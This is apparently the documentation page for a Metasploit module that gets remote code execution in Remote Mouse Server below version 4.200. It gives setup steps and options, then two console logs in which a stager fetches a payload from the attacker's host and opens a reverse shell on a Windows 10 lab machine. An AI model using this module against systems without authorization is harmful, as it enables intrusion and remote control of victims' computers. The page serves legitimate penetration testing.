## Vulnerable Application This module utilizes the Remote Mouse Server by Emote Interactive protocol to deploy a payload and run it from the server on versions < 4.200 (500 server response). This module will deploy a payload regardless if server authentication is required. Tested against 4.110, current at the time of module writing Version 4.110 can be downloaded from (unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712] ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/windows/misc/remote_mouse_rce` 4. Set `rhost` and `lhost` as required. 5. Do: `run` 6. You should get a shell as the user who is running Remote Mouse. ## Options ### SLEEP The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `1`. ### PATH The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`. ## Scenarios ### Remote Mouse 4.110 on Windows 10 ``` resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce [*] Using configured payload windows/shell/reverse_tcp resource (remote_mouse.rb)> set rhosts 192.168.2.95 rhosts => 192.168.2.95 resource (remote_mouse.rb)> set lhost 192.168.2.199 lhost => 192.168.2.199 resource (remote_mouse.rb)> set verbose true verbose => true msf6 exploit(windows/misc/remote_mouse_rce) > run [*] Started reverse TCP handler on 192.168.2.199:4444 [*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable) [+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411 [*] 192.168.2.95:1978 - Connecting [*] 192.168.2.95:1978 - Sending Windows key [*] 192.168.2.95:1978 - Opening command prompt [*] 192.168.2.95:1978 - Sending stager [*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/ [+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging [+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging [*] 192.168.2.95:1978 - Executing payload [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.2.95 [*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400 [*] 192.168.2.95:1978 - Server stopped. [!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target Shell Banner: Microsoft Windows [Version 10.0.16299.125] ----- C:\Users\windows>whoami whoami win10prolicense\windows C:\Users\windows>systeminfo systeminfo Host Name: WIN10PROLICENSE OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299 ``` ### Remote Mouse 4.110 on Windows 10, with a password ``` resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce [*] Using configured payload windows/shell/reverse_tcp resource (remote_mouse.rb)> set rhosts 192.168.2.95 rhosts => 192.168.2.95 resource (remote_mouse.rb)> set lhost 192.168.2.199 lhost => 192.168.2.199 resource (remote_mouse.rb)> set verbose true verbose => true msf6 exploit(windows/misc/remote_mouse_rce) > exploit [*] Started reverse TCP handler on 192.168.2.199:4444 [*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable) [+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411 [*] 192.168.2.95:1978 - Connecting [*] 192.168.2.95:1978 - Sending Windows key [*] 192.168.2.95:1978 - Opening command prompt [*] 192.168.2.95:1978 - Sending stager [*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/ [+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging [+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging [*] 192.168.2.95:1978 - Executing payload [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.2.95 [*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400 [*] 192.168.2.95:1978 - Server stopped. [!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target Shell Banner: Microsoft Windows [Version 10.0.16299.125] ----- C:\Users\windows> ```